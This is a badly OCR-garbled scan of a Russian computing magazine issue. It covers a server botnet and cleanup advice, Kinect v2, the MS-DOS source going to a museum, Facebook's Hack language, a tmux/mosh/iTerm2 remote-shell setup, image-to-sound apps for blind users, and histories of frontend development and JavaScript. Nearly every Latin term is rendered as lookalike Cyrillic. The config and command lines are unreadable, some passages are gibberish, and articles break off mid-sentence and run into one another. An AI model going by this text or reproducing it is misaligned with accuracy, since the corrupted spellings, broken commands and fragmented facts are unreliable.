в сутки рассы- 
лал зтот могучии 
ботнет. Кроме того, 
ежедневно на на- 
бор зксплоитов 
перенаправликггси 
свыше 500 тыслч 
посетителеи ском- 
прометированных 
саитов. Россил тоже 
попала в список по- 
страдавших, у нас 
обнаружили 800 за- 
раженных серверов. 




При заражении 
МпсПдо ЕЗЕТ ре- 
комендует полнук) 
очистку памити, 
переустановку 
ОС и всего про- 
граммного обе- 
спеченил. Также, 
конечно, необходи- 
мо сменитв все ис- 
полһзуемые пароли 
и клкзчи, посколвку 
суш.ествук)шие 

учетные данные, 
скорее всего, ском- 
прометированы. 



ПРЕДСТАВЛЕН К1ЫЕСТ2 
ДЛД\Л/1Ы0О\Л/3 

Контроллөр второго поколенид будөт доступөн әтим лөтом 




а конферешдии ВиПс! 2014 офиииалвно представили вторукз версикз бесконтактного 
контроллера КЈпест длл персоналыных компыотеров, устроиство анонсировал сам 
вии,е-президент МЈсгозоТСТерри Маиерсон. 



Первыи КЈпест длл \Л/Јпс1о\л/5 вышел еш,е в 2012 году, и тогда устроиство стоило вдвое 
дороже версии длл Хоох. Стоимоств второи версии пока неизвестна, но технические под- 
робности уже доступны. Контроллер оснашен камерои с разрешением 1080р и выгллдит 
практически аналогично устроиству длл Хоох Опе, разве что әмблема Хоох уступила место 
индикатору питани^, а на верхнеи панели размешена надписв КЈпест. Контроллер второго 
поколени^ выполнен в автономном корпусе с собственными кабел^ми питани^. Однако де- 
ваис также оснашен и спеииалвным хабом, на котором присутствует выход 1Ј5В 3.0 и источ- 
ник питани^ с переклкзчением на 110 или 220 В. МЈсгозотт. обешдет, что устроиство станет 
лучше распознаватв жесты и изменение положени^ тела, а также лучше фиксироватв дви- 
жени^ при недостаточном освешении. 

Напомнкз, что первыи КЈпест умудр^лисв исполызоватв не толвко длл игр, но и длл управ- 
лени^ летакзшими дронами, длл распознавани^ и перевода ^зыка жестов и других весвма 
нетривиалыных задач. Хочетс^ веритв, что выход второи версии и ЗРК длл нее даст жизнв 
и другим интересным иде^м. 




1.1 и^ЛЈ 

ВЕРСИИМЗ-003 
ПЕРЕДАЛИ 
В МУЗЕИ 

Исходные коды МЗ-ӘОЗ 1 .1 и 2.0, 
а также \Л/огс! Тог \Л/тс1о\л/5 1.1 теперв 
стали достоанием обшвственности, так 
как МЈсгозотт. передала их в калифор- 
ниискии Музеи компыотернои истории 
в Маунтин-Выо. Размеры и функи,ионал 
продуктов сеичас могут лишб позаба- 
витб, а когда-то такие ТТХ казалисв чем- 
то оченв крутым: М5-005 занимает 300 
Кб и требует всего 12 Кб оперативнои 





#70 



АМЕРИКАНи,ЕВ 
СЧИТАК)Т, ЧТО 
ГИГАБАИТ— ӘТО 
НАСЕКОМОЕ 

— » Читатв резулвтаты соииологическо- 
го опроса, проведенного компаниеи 
уоисһегс1оио!, веселее лкзбого анекдота. 
Из 2392 опрошенных американи,ев 42% 
сказали, что материнска^ плата — әто 
деталв круизного лаинера. 23% думакзт, 
что МРЗ — робот из филвма «Звездные 
воины». 18% уверены в том, что В1и-гау — 
әто морское животное. И еше 11 % уве- 
рены, что НТМ1_ — әто болезнв, котора^ 
передаетсл половым путем. 





һаск 

к-_у.*---|и>.|гтк1:".һ-Сү | ■№.'ј._1 Ыһһ4з-^| 1 1 ■ - 



Пока одни компании раз- 
рабатывакот собственные 
^зыки, Соод1е, Ғасеооок, 
ЫпкесПп и ТмИег работа- 
кот над созданием СУБД 
Мео5са1е301_. Әто будет 
«макроверсил» Му501_, 
форк, оптимизированныи 
дл^ болвших БД интер- 
нет-масштаба. 



ҒАСЕВООК 
ПРЕДСТАВИЛА 

^ЗЫКНАСК 



Открытыи ^зык Наск — родственник РНР 




ш,е в прошлом году ВКонтакте представила свокз версикз РНР — ^зык КЈКепРНР, пе- 
реход на которыи вдвое увеличил производителвноств, если веритв более поздним 
сообшени^м. Теперв свои ^зык представила и друга^ соисетв — Ғасеооок. 



Наск во многом схож с РНР, в частности быстротои программировани^, но одновремен- 
но Наск отличает статическа^ типизаиут, исполвзуема^ в С++, Јауа и р^де других ^зыков. 
Новыи ^зык сочетает в себе силыные стороны разных ^зыков программировани^ и идеален 
длл компании, где работакзттыс^чи программистов, которые обновл^кзт коддважды в денв. 
Кстати, на ^зыке Наск базируетс^ почти весв саит Наск с его более чем миллиарднои ауди- 
ториеи (сеичас компани^ на финалынои стадии миграиии с РНР). Длл работы с приложе- 
ни^ми, написанными на Наск, понадобитс^ виртуалвна^ машина ННУМ, поддерживакзша^ 
одновременно РНР и Наск. Благодар^ әтому не придетс^ переписыватв весв код на Наск 
разом, можно делатв әто постепенно. Длл загрузки Наск и ННУМ понадоб^тс^ 1Јһип1:и 12.04 
1_Т5, ШзипШ 13.10 или РеЫап 7. Также можно скачатв код Наск и скомпилироватв его само- 
сто^телвно. 



НеасГег 



КОМФОРТНЫИ 

ШЕЛЛ — 



В последнеө врем^ мне доволвно много приходитс^ 
работатв в консоли с удаленными серверами. Поимал 
себ^ на мысли, что, несмотр^ на 2014 год, ошушени^ 
от работы по 55Н напоминакзт времена, когда был толв- 
ко Те1пе1:. Но после некоторых әкспериментов жизнв ста- 
ла заметно лучше. 






Степы Илвина 



ТРЕБОВАНИЛ 

Что мент раздражает болыие всего, так зто что после лкзбого обрыва соединени^ или вы- 
клкзчени^ (фактически засыпани^) ноутбука нужно заново подклкзчатвс^ (хорошо, если с тои 
стороны еств зсгееп). Позтому первое требование простое — нужно, чтобы шелл работал 
без потери контекста после перезагрузки или восстановлени^ из сна, при изменении марш- 
рутизаи,ии (например, переклкзчение между \/\/Ј-ҒЈ-сет^ми или после подклкзчени^ к \/РЫ) 
или в случае каких-то временных проблем с сетыо. Далвше требовани^ попроше: сохра- 
нение иветов, нормалвна^ работа сору-раз1е, поддержка иветовых схем, беспроблемна^ 
работа скроллинга. 

КОНФИГУРА1ДИЛ 

90% времени п работакз под 05 X, позтому буду рассказыватв о своем конфиге. В прини,ипе, 
от системы к системе ничего не мен^етс^, кроме непосредственно терминала. На серверах 
в основном у мен^ РеЫап и 11оип1и, но зто вообше не имеет значени^. Итак, конфиг, с кото- 
рым в последнее врем^ ^ живу, — ГГегт2 + Мозһ + 1тих. 

ЈТегт2 

Собственно, ГГегт — зто один из самых известных терминалов под 03 X. Он уже из коробки 
неплохо приготовлен, но единственное — нужно не забытв вклкзчитв иветовые схемы и под- 
держку скроллинга. Дл^ зтого в настроиках надо выставитв Тегпгппа! Туре в х1егт-256со1ог 
и убедитвс^, что опиут ЕпаЫе х1егт тоизе герог^пд активирована. Вообше, рекомендукз 
познакомитвс^ со всеми фишками программы (разделение на панели, аи1осотр1е1е, под- 
держка Сго\л/1 и прочее) — п открыл дп^ себ^ много полезного. 

1ших 

Менеджер сессии, без него никак. Если ты когда-то ра- 
ботал со зсгееп, то 1тих — зто тот же зсгееп, но на сте- 
роидах. Правда, из всех его функи,ии ^ исполвзукз толвко 
возможноств сохранитв мокз сессикз на удаленном сер- 
вере. Иде^ проста^: когда п подклкзчакзсв, п всегда начи- 
накз с того места, где закончил, — например, работы над 
каким-нибудв скриптом в УЈгтГе. Состо^ние сохран^етс^. 
Да, зсгееп делает то же самое, но давно не развивает- 
сл — позтому 1тих в идпом выигрывает. 

Ттих легко устанавливаетс^ на удаленном сервере, 
в конфиг стоит добавитв что-то вроде: 



ПеЫ-5Ө55ЈОП 

5е1:-ы1пс1оы-ор1:10п -§ тос1е-тои5е оп 
5е"П -§ Ыз^огу-ИтИ: 250ӨӨ 



Обв^сн^кз, в чем смысл. Если активнои сессии нет 
и при зтом выполн^етс^ попытка подклкзчени^ (аМаск), 
то 1тих создаст новукз сессикз — зто делает перва^ строч- 
ка конфига. Втора^ вклкзчает поддержку мыши. Третыз 
определ^ет размер истории. 



Зеззјопз 



£ 11 51: 5-еЕ51рги5 
Ј паие Е-еЕ-£1оп 



ШЈпдсшз (1аһз) 



С псм *1пгЈоһ 

л плтһ* и ј шкгн 

& кШ и1пс1а<н 

гпиуһ* ш м \ шЈстн - ргстсН м|| 4\н - л ш"ы шјшҺгг* 

:поүем<СК> иоүе - ј1псЈсҹ го £л.е пек* ипигегЈ пипРвг 



Рапез (зр1Из) 



X һопгоп1а1 ЕрИИ 
¥ег"Ыси1 з р 1 1.1: 

о 5-мар рапев 

3 зһон раг.с питИјггз 

,. 1г|ЛЈ I. V - 1 |Ј£у 1 е НШ?П 1 Јуои1_^ 



Шпаргалка по 1тих 



Мозһ 

Мы уже как-то писали про Мозһ. Әто оченв полезна^ утилита, котора^ выступает чем-то вро- 
де коннектора между сервером и клиентом. Даже если соединение обрываетс^ (а обры- 
ваетс^ оно посто^нно баналыно из-за перемешени^ из дома на работу, ^ работакз на ноу- 
те), она терпеливо подождет, пока все станет ОК, и без вс^ких проблем позволит вернутвс^ 
к работе. «Ни единого обрыва», как в случае с 55Н :). 

Нужнукз версикз лучше вз^тв из Сһ:'а, тогда она стопроиентно будет поддерживатв мышв 
и скроллинг: 

§1± с!оп е 1тЕ'Е р5://§Ј'Еһиһ . сот/ке11:һы/то5һ . §гЕ 
сс! тозһ/ 



5ис1о ар1:-§е1: һиИс1-с1ер то5һ 
Ј^/аи^о^еп . 5һ && ./соп1п§иге && таке 
5ис1о таке 1П5"са11 



Соответственно, клиентска^ частв в ОЗХустанавливаетс^ через НотеВге\л/: 
һгеы Јп5"са 11 - -НЕАР тоЫ1е-5һе11 



КАК ЗТИМ П0ЛҺ30ВАТҺСЛ 

На выходе все оченв просто. Мне достаточно набратв команду шо5һ Н05Т -- тших а, 
и ^ всегда получакз доступ к шеллу в том месте, где п закончил. Тглих сохран^ет сессикз 
на удаленном хосте, Мозһ позвол^ет не переподклкзчатвс^ сто раз на днкз, а ЈТегт — ком- 
фортно работатв с шеллом. Можно, конечно, прокачиватв систему еиде далыие и, к приме- 
ру, установитв на удаленном хосте 25Һ, но әто уже детали. 









Мозһ 


[ГТШ5Һ] 1 




1ојҺ Иеһ д££д Ные 




(тоЫ1е 8һе11) 


* ИЈҺаС И 1оок Нке? 




НетоЈв 1өгтјпа1 аррНсаИоп гһа! а11о\л/з гоаттд, 
зиррог!з ЈгИвгтгКегП соппесНуһү, апо 1 
ргомсЈез һ1е1Ндеп1 1оса1 есһо апс! Ппе есНИпд о^ 
изег кеуз^гокез. 


** 1*нге 

*** Вог1г»д ғ гее доҒЫаге Уеһ зИе,,, 

*** (Лсһитеу пеизрарег: "АгоагпЈд гето^е 8һе11 ргодгат вшеерз гаисп! 1 М" 
*** Маке 1^ 1сок Ике а Ғзке з£зг£.ир соирагсы. <— 1.е£'5 90 «Иһ ^Ыз. 
* ВеглҒИ Ј оҒ НојҺ 




Мозһ 13 а гер1асвтвп1 1ог ЗЗН. 11'з тоге гоРиз! 


** ГСоат асгоаз 1лЈЈ-Ғ1 пе£»)огкз ог ^о се11 ыИһои1 Нгерр^пд еоппес^оп. 




апс! гезропзК/в, езрвсаНу оувг Ш-Ғ\, сөНи&г, 


** Моге рЈеазап); 1о <;чре — Јг^еШчегЛ 1оса1 есһо 15 1п5^п1;. 1 




апс! 1опд-сНз1впсе Нпкз. 


** N0 пеес! 1:о һе вирегизег 1ПБ1;а11, 




Мозһ 13 1гее зоШ/агө, ауаИаЫе 1ог (ЗМШЈпих, 
ҒгееВЗО, Зо!апз, Мас 03 X, апо 1 Апс1гоЈс1. 


** Мозһ ЈоезпЧ ҒШ ир һиҒҒегз, 50 С£г1-С ыогкз ^шск1у оп гштаиауг, 
** Пезхдпео 1 Ғгот зсг^сһ Ғог итсоЈе; Ғјхее ои^з ш 5£Н, о*һег £егч1па1з, 

** Ғг$4 / 0Р&Г|-60чГС* 80Ғ^ш*Гб* 






|Ј-;"— П Н11 1.13 <игә.Ј ■ 




ОГПГ: ГУ £Г 0С1 С1С 







Мозһ — 55Н без обрывов 



Неас/ег 




Илвл Русанен 

ш5апеп@геа1.хакер.1ЧЈ 




РгооЈ-оЈ-Сопсер* 




УЧИМСЛ СМОТРЕТҺ 
НА МИР... УШАМИ 



Матөматики и криптографы давно әкспериментирунзт 
с игралһными картами дл^ кодировани^ и шифрова- 
ни^ информаиии. Әто св^зано стем, что колода карт 
обычно не вызывает подозрени^ у правоохранител^- 
ныхорганов, спеислужб и разведчиков. Игралвные 
карты можно исполһзоватв и как генератор псев- 
дослучаиных чисел и даже как криптографическии 
блокнот. Фактически колода карт — әто самыи удоб- 
ныи и самыи надежныи метод шифровани^ информа- 
и,ии в отсутствие компһкотера. 



мош,ыо спеииалвнои антенны и чипа, установленного на затылке, Нил смог научитвс^ свободно 
различатв до 360 иветов и вполне неплохо устроилс^ в әтом мире. Однако что делатв тем, кто, 
в отличие от Нила, полностыо слеп? 

Двадиатв два года назад голландскии инженер Петер Меиер (Ре1ег Мејјег) начал работу 
над исследователвским проектом у01Се. Он преобразует простые черно-белые картинки в по- 
следователвноств звуков. Программа сканирует изображение слева направо и дпп каждого 
столби,а пикселеи генерирует звук на соответствукзшеи частоте. Чем выше точка на картин- 
ке — тем выше звук. Например, дпп диагоналынои линии из левого нижнего в правыи верхнии 
угол звук начинаетс^ на низкои частоте, а завершаетс^ на высокои. Более сложные картинки 
воспринимакзтс^ как беспор^дочныи шум, но при тренировке в них можно разобратвс^. 




Установитв ЕуеМизЈс 

на Ј05 можно из Арр 51оге. 



Саитпроекта^01Се: 
зеетдууЈШзоипд.сот 




ак звучит әтот и,вет?» — дл^ болыиинства из нас зтот вопрос покажетс^ 
по менвшеи мере странным, но не дл^ НилаХарбиссона (ЫеП НагЫззоп), ир- 
ландского исследовател^, художника и первого офии,иалвного киборга, ро- 
дившегос^ с ахроматопсиеи (полнои неспособностыо различатв и,вета). С по- 



Алгоритм работы үСНСе 






В ЧЕМ ИДЕЛ? 

В 2007 году невролог Амир Амеди (Агтнг АтесП) с коллегами решил испробоватв у01Се на сле- 
пых от рождени^ лкзд^х. Удивителвно, но всего через 70 часов зан^тии они смогли различатв 
оченв сложные обвекты на картинках размером 4500 пикселеи, например лии,а и перекрест- 
ки на улии,ах, — а ведв әти лкзди никогда ничего не видели в своеи жизни. Подклкзчив наго- 
ловнукз камеру к компыотеру и надев наушники, они могли ходитв по комнате, ориентиру^св 
исклкзчителвно по звуку. Через каждые несколвко шагов камера делала фотоснимок, кото- 
рыи транслировалс^ в наушники. После дес^ти дополнителвных часов тренировки слепые 
лкзди способны распознаватв силуәты лкздеи и повтор^тв их позы. 



Современнал хардварнал 
реализа1дил у01Се 




ГДЕ ПОИГРАТҺСЛ? 

Недавно группа исследователеи под руководством Амеди выпустила усовершенствованнукз 
версикз у01Се — программу ЕуеМизЈс, бесплатное приложение под ЈРҺопе. Усовершенство- 
ванныи алгоритм выдает более при^тные звуки и способен передаватв информаи,икз о и,вете. 
В основе работы программы лежит усовершенствованныи алгоритм, способныи различатв 
не толвко положение пикселеи по ос^м X и Ү но и и,вета. Программа поддерживает как реал- 
таимовукз обработку с камеры, так и загрузку изображении из фотоалвбомов. 

В качестве тренировочных изображении (длл привыкани^ к подобному способу воспри- 
^ти^ информаи,ии) программа содержит генератор простеиших 20-обвектов. Как толвко 
ты научишвс^ безошибочно их различатв на слух, можно переходитв к более сложным обв- 
ектам. Толвко не забудв перед началом работы откалиброватв уровни освешенности и на- 
сышенности. 
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Котеика звучит куда милее, чем Неаг^Ыеео! 



У ЕуеМизЈс множество настроек 
и ошдии длл калибровки алгорит- 
ма под конкретнук) обстановку 
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0№Е 1ЛТ0 
ҒШШГО 

КАК ВСЕ ПОМЕНЛЛОСҺ ЗА ПОСЛЕДНИЕ 15 ЛЕТ 

Мы живөм в удивитөлһноө врем^. На наших глазах рож- 
данзтсл, развиванзтс^ и транформирунзтсл во что-то иное 
не толһко технологии, но и иелые профессии. Именно так 
случилосв с системными администраторами, которые 
сеичас практически исчезли, уступив место ОеуОрз-инже- 
нерам. С 1гоп1епс1-разработкои все наоборот: она сеичас 
переживает самыи расивет. Почемутак? 




□ те времена, когда компыотеры были болыиими, а интернет оченв маленв- 
ким, никто толком не знал, что же в зтом загадочном интернете можно де- 
латв. Как ты наверн^ка помнишв, почти все саиты были оченв простые: 
текст с информаи,иеи, пара ссылок на аналогичнукз странииу и все. Бра- 
узеры тоже были оченв простые, а зачастукз даже чисто текстовые (например, кон- 
солвные), позтому и странички состо^ли из самых базовых тегов НТМ1_, которые раз- 
мечали структуру текстового документа. Пгтд^ на все, что происходит сеичас, можно 
сказатв, что именно тогда и был золотои век семантики и теги исполызовалисв деи- 
ствителвно по пр^мому назначеникз. Впрочем, золотое детство интернета быстро 
прошло, по^вилисв первые болвшие саиты с повышенными требовани^ми к внеш- 
нему виду, а значит, и к верстке. 

Посколвку единственным универсалвным способом точного размеидени^ әле- 
ментов дизаина были таблии,ы, то настала әра табличнои верстки. С55 тогда еиде 
не рассматривалс^ болвшинством как инструмент позии,ионировани^ әлементов 
на страни1де, в основном из-за недостаточнои поддержки соответствукзидих своиств 
в браузерах. Лучшее, на что мог рассчитыватв С55, — управление иветом, выравни- 
ванием и положением шрифта, и то дгт әтого было множество атрибутов у тегов (о, 
славныи одсо1ог). 

Как следствие, не было никаких «фронтенд-разработчиков», посколвку не было 
самого фронтенда. Были версталыдики, и были программисты. Программисты де- 
лали все крутые веиди, а версталыдики рыдали и ждали 1Е6, в котором будет поддер- 
живатвс^ столвко крутых веидеи, например полупрозрачноств РЫӨ! Наивные, да? 

Началом рождени^ того фронтенда, которыи мы сеичас наблкздаем, было по^вле- 
ние возможности асинхронных запросов через ХНВ. Все саиты захотели себе АЈАХ, 
чтобы бытв крутыми, быстрыми и отзывчивыми, а версталыдики открыли дгт себ^, 
что Јауа5спр1: можно не толвко писатв в атрибут опсИск, но и вообиде активно его 
исполвзоватв дл^ оживлени^ странии,. Посколвку программисты не хотели маратв 
руки в «каком-то скриптовом ^зыке дл^ браузеров», делатв вскз работу пришлосв 
версталыдикам. И, как әто обычно и бывает, работы становилосв толвко болвше. 

По мере роста производителвности браузеров на клиент, то еств в браузер, кото- 
рыи работает на машине полызовател^, стали переноситв многие паттерны из «болв- 
шого» программировани^. По^вилисв первые МУС-фреимворки, которые управл^ли 
загружаемыми через АЈАХ-данными, правилвно их отображали на странии,е и дела- 
ли другие запросы по необходимости. Все әто было еиде не так активно, как сеичас, 
просто потому, что Јауа5спр1:-движки были медленные и норовили подвеситв брау- 
зер от совершенно пуст^чных задач. 



В давние времена версталыдик должен был бытв и чутв-чутв программистом, 
и чутв-чутв дизаинером — и хорошо, если не чутв-чутв. Но развитие исполызовани^ 
Јауа5спр1: стало водоразделом: те, кто были чутв-чутв программистами, стали раз- 
виватыт во фронтенд-разработчиков, а те, кто были чутв-чутв дизаинерами, стали 
просто хорошими дизаинерами, которые знакгг спеи,ифику верстки саитов. 



РОЖДЕНИЕ ФРОНТЕНДА 

Примерно в әтот период все и началосв. Хот^ версталыдикам и ранвше приходилосв 
«оживл^тв» собственные макеты, накладыва^ на них реалвные данные через выдава- 
емые программистами вызовы методов, но с по^влением динамики на клиенте стало 
^сно, что заниматвс^ формированием НТМ1_ на сервере и последукзидим его измене- 
нием на клиенте должен один человек. Отчетливо выделилисв бәкенд, как некотора^ 
обертка вокруг базы данных, скрывагаш.а^ ее внутреннее устроиство и реализукзша^ 
некоторые методы получени^ данных («ручки» дгт фронтенда), и фронтенд, которыи 
занималс^ выдачеи требуемого НТМ1_ по запросам полызователеи. Примерно в зто 
врем^ и обозначилисв основные задачи фронтенда: агрегаии^, шаблонизаии^ и ке- 
ширование. 

Агрега^ил — әто обработка данных, поступивших от бәкенда, в тот вид, которыи 
наиболее удобен дл^ последукзшеи шаблонизаиии. Например, если бәкенд выдает 
требуемые данные двум^ отделвными методами, а тебе в итоге нужен один список 
на страни1де, бываетудобно заранее слитв резулвтаты двух методов, чтобы упроститв 
шаблон. Или, например, если бәкенд не умеет сортироватв в нужном тебе пор^дке 
или таких пор^дков сразу несколвко, то на әтап агрегаи,ии может лечв и задача само- 
сто^телвнои сортировки полученных данных. 

Шаблониза^ил — әто создание резулвтирукзидего НТМ1_ из полученных данных. 
В разных архитектурах шаблоны бывакзт разнои степени сложности: от простеиших 
шаблонов, прозрачно отображакзидих пришедшие из базы данных суидности, до слож- 
ных систем, вклкзчакзидих в себ^ значителвныи кусок бизнес-логики. 

Кеширование — әто запоминание полученного по конкретному запросу отве- 
та, чтобы в далвнеишем избежатв запросов к базе данных и последукзидеи обра- 
ботки. Кеширование — әто не всегда задача фронтенда, часто ее перекладывакзт 
на НТТР-сервер, однако совсем избавитвс^ от әтои части не получитс^: все равно 
никто лучше фронтенда не знает, как именно надо кешироватв какие разделы саи- 
та. У теб^ может лежатв статическии фаилик, которыи можно закешироватв на год, 
а р^дом будет АЈАХ'ова^ ручка, котора^ выдает актуалвныи статус системы и кото- 
рукз можно дергатв несколвко раз в секунду, получа^ разныи ответ. Обрати внима- 
ние, что кешироватв можно как готовыи НТМ1_, так и ответ от бәкенда по каким-то 
попул^рным запросам. 

Ну и конечно же, огромным толчком дгт развити^ фронтенд-разработки стало 
по^вление 1\1ос!е.Ј5. Если говоритв точнее, то само по^вление Ыос!е.Ј5 ^вилосв след- 
ствием повышакзидегос^ значени^ ЈауаЗспр!:, о котором мы говорили ранвше. Но кого 
волнукзт такие тонкости? Фронтенд-разработчики захотели свои собственныи дви- 
жок на знакомом ^зыке, и они получили его. А вместе с движком они получили кучу 
возможностеи. 

Если раныие ЈауаЗспр! воспринималс^ всеми как маргиналвныи ^зык дл^ брау- 
зеров, то теперв по^виласв возможноств запускатв его на сервернои стороне. Вни- 
мателвныи читателв уже знает, к чему әто привело. Конечно же! Работы стало еиде 
болыие. Фронтенд-разработчики начали самосто^телвно «собиратв» свои проек- 
ты, то еств приводитв их из того вида, в котором удобно разрабатыватв, в тот вид, 
в котором все должно показыватвс^ полызователкз (минифии,ироватв код, загружа- 
емыи на клиент, минимизироватв картинки, компилироватв шаблоны по необходи- 

мпптм \л тдк" лдпрр^ Пплппбнрр ппп пбпп^ ПППР^ТПР ПДПП^ДЖРМ НМЖР НП РДУРН пдм 



факт — фронтенд-разработчики захотели делатв все сами. 

Разумеетс^, в болвших компани^х по-прежнему еств бәкенд-разработчики, замо- 
роченные на производителвности и обработке огромных массивов данных, но сеи- 
час вполне возможно создатв неболвшои проект, которыи был бы полностыо написан 
на ЈауаЗспр!. Ранвше за такукз идекз теб^ бы засме^ли «насто^шие программисты», 
а сеичас они по болвшеи части груст^т и ругакзтс^ на прототипнукз парадигму насле- 
довани^. 

Ну и конечно, не стоит забыватв и про возможноств исполвзовани^ одинаковых 
шаблонов на сервернои стороне и на клиенте, посколвку производителвноств совре- 
менных браузеров позвол^ет выполн^тв шаблонизаиикз на клиентскои стороне. 

СТРУКТУРА СОВРЕМЕННОГО ФРОНТЕНДА 

Современнал клиентскал частв может бытв устроена оченв по-разному, и, как прави- 
ло, ее вид оченв силвно зависит от требовании конкретного саита. В каких-то случа^х 
идеалвным вариантом будет 5Јпд1е раде аррһсаИоп с болвшим количеством динамики 
на клиенте, в других же нужны лишв отделвные интерактивные әлементы в обычнои 
структуре саита. Так или иначе болвша^ или менвшал интерактивноств ложитсл на кли- 
ентскукз сторону, обшди сложноств создани^ саита (фронтенд + клиент) обычно оди- 
наковал. 1Дикл жизни запроса от полвзователл обычно состоит из следукзидих зтапов: 
• Запрос приходит на НТТР-сервер. Там запрос уже может бытв отклонен (а-та-та, 
кто лезет на неправилвныи порт) или перенаправлен на статическии раздел (на- 
пример, если запрашивакзт С55 или Ј5) или собственно в наше приложение. 
Приложение получает запрос с определеннои метаинформаииеи и осушествл^- 
ет роутинг, то еств решает, какои кусок кода (контроллер) должен обрабатыватв 
подобные запросы. Например, полвзователкз без куки логина на әтом әтапе мож- 
но отправитв форму авторизаиии. 

Контроллер получает запрос и смотрит, какие данные ему нужно получитв, при- 
чем әто может бытв многоәтапныи проиесс, и,елые иепочки запросов по опреде- 
ленным услови^м. 

Контроллер агрегирует полученные данные и отправл^ет их на шаблонизаиикз. 
Шаблонизатор шаблонизирует шаблоном и отдает полвзователкз полученныи ре- 
зулвтат. 

Заметв, что запросы к АЈАХ-ручкам за данными тоже проход^т әти әтапы, просто 
обычно у них нет шаблонизаиии (в случае если ответ от бәкенда можно выдатв на- 
пр^мукз на клиент) или она силвно упроидена до филвтраиии и сериализаиии данных. 

Конечно же, в разных архитектурах әти әтапы выггтд^т по-разному. Например, 
контроллер может бытв статическим фаилом, на которыи НТТР-сервер прозрачно 
перенаправл^ет запросы, а затем уже наше приложение выполн^ет все необходи- 
мые методы бәкенда, описанные в нем, и дергает соответствукзидии шаблон. В слу- 
чае с Ыос!е.Ј5 все әтапы после НТТР-сервера обычно представл^кзт собои модули, 
то еств Јауа5спр{-код, а получение данных сводитс^, как правило, к НТТР-запросам 
к бәкенду. 

Собственно, в упоминавшиес^ нами старые времена все әти әтапы тоже присут- 
ствовали, просто всем, кроме написани^ шаблонов (а зачастукз и ими тоже), занима- 
лисв бәкенд-программисты. Сеичас же Јауа5спр1: может все (а если он чего-то не мо- 



жет, смотри пункт первыи), позтому и зона ответственности бывших версталыдиков 
силвно выросла. Говор^т, что бзкенд-программистам тоже стало сложнее, кака^-то 
Вјд Оа1:а и мапредыосы, но мне кажетс^, зто все отмазки, чтобы не делатв свокз ра- 
боту, а перекладыватв ее на нас, несчастных фронтендеров. гк: 
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АРХИТЕКТУРА 3.0 



КЛИЕНТСКИИ ЈАУАЗСҒПРТТОГДА И ТЕПЕРҺ 

Восемнадиатв лет назад компанил Ые1зсаре 
СоттипЈсаИопз выпустила новунз версинз своего брау- 
зера — Ые1зсаре 2.0. Помимо таких крутых штук, как воз- 
можностһ задатв и,вет шрифта, вставитв фреим или ани- 
мированнунз гифку, в нем были представлены скрипты 
длл исполненил в контексте загруженнои странииы. По- 
делка получиласв удачнои — настолвко, что МЈсгозоИ 
в своем ответном 1п1егпе1 Ехр1огег 3.0 запустила поддерж- 
ку ЈЗспрЈ, собственного варианта скриптового лзыка 
длл браузеров. И понеслосв... 



Изначалыно ^зык предполагалосв исполызоватв как прослоику между НТМ1_-размет- 
кои страни1ды и Јауа-апплетами дгт несложных операиии на клиенте. Как призналс^ 
в своем комментарии Әрик Липперт (Егјс Ыррегт) — один излкздеи, причастныхкраз- 
работке ЈЗспрт в МјсгозоТт, иелыо создани^ ЈауаЗспрт было заставитв обезызнку пл^- 
сатв при наведении мыши. Так что в жертву простоте были принесены многие веши, 
которые воспринимакзтс^ какдолжное в других ^зыках, — например, приватные пе- 
ременные. Ситуаии^ осложн^ласв и тем, что на фоне гонки браузеров разработка 
и внедрение фич в ^зык и в АР1 дгт взаимодеистви^ с загрузившеи скрипт странии,еи 
происходили с бешенои скоростыо, а стандарты отча^нно пыталисв их догнатв. Одни 
и те же веиди в разных браузерах происходили по-разному, и позтому делатв что-то 
сервезнее валидаиии форм с помоидыо ЈауаЗспрт было достаточно бессмысленно. 



Пока все думали, как еше можно приспособитв клиентские 
скрипты себе на полызу, по^вилс^ формат ХМ1_. Он позвол^л 
описыватв в виде разметки не толвко текст, но и лкзбые данные, 




1 1пТо 






Нужно сказатв, что способ изолироватв частв кода и данных от доступа 
снаружи в ЈауаЗспрт все-таки еств, и способ әтот — замыкани^. На основе 
замыкании обычно и стро^тс^ все клиентские решени^ по модул^ризаиии 
ЈауаЗспрт-кода. Самое известное из них — ВедшгеЈЗ. Оно позвол^ет соз- 
даватв разделвные модули клиентского ЈЗ-кода, указыватв между ними 
зависимости, а также подгружатв недостакзшие фаилы с сервера. 









допускакзшие строковое представление. Еше чутв позже в МјсгозоТт придумали 
ХМШттрВедиезт дл^ динамическои подгрузки контента с сервера, а осталвные 
реализовали поддержку его АР1. Если добавитв скзда по^вившукзс^ в браузерах 
возможноств измен^тв ООМ с помоидыо ЈауаЗспрт, получитс^ АЈАХ (Азупсһгопоиз 
ЈауаЗспрт апс! ХМ1_) — набор технологии дл^ асинхронного взаимодеистви^ с сер- 
вером и отображени^ резулвтата на веб-страниие без ее перезагрузки. Со време- 
нем ХМ1_ в әтои св^зке уступил место более лаконичному и ЈЗ-ориентированному 
формату Ј301Ч , но название прижилосв и исполызуетс^ до сих пор. 

К әтому моменту с загруженным документом уже можно было вытвор^тв прак- 
тически что угодно — конечно, если автор скрипта был готов жратв әтот кактус, не- 
взира^ на болв от разнииы в браузерных АР1. А желакзших становилосв все болв- 
ше. Простота ^зыка, низкии порог вхождени^ и желание оживитв скучные статичные 
веб-странички привлекали әнтузиастов. А возможноств создатв легкое, но функиио- 
налвное веб-приложение и доставл^тв его полызовател^м, нетребу^ отнихдгт әтого 
ничего устанавливатв на компыотер, привлекала паианов посервезнее. И тут начали 
ввтсн^тыз^ интересные подробности про сам ЈауаЗспрт. 

Оказалосв, что под видом Јауа Ыте в браузеры попал ^зык с забористои смесыо 
парадигм, вобравшеи многое как от обБектно-ориентированного, так и от функиио- 



налыного подходов. Толвко вот прототипна^ моделв наследовани^ работала не так, 
как привычна^ классова^. А динамическа^ типизаш/т значителвно усложн^ла стати- 
ческии анализ кода. И работатв нужно было по болвшеи части с асинхронными за- 
просами и событи^ми. Все зто накладывалосв на однопоточнукз среду выполнени^ 
в браузере, котора^ еиде и временами безбожно тормозила. 

В обидем, просто вз^тв имевшиес^ знани^ о программировании и применитв 
их не получалосв. Но сервезных паианов в клиентскои разработке становилосв все 
болыие, и остановитв их на пути в светлое Ј5-будушее оказалосв не так-то просто. 
Началисв попытки создатв библиотеки дгт того, чтобы получитв обидии интерфеис 
дгт всех браузеров, скрывакзидии разнииу в реализаиии ими различного функи,иона- 
ла, — их резулвтатами стали Рго1о1уре, МооТоо1з и, конечно, јОиегу. Последнии обрел 
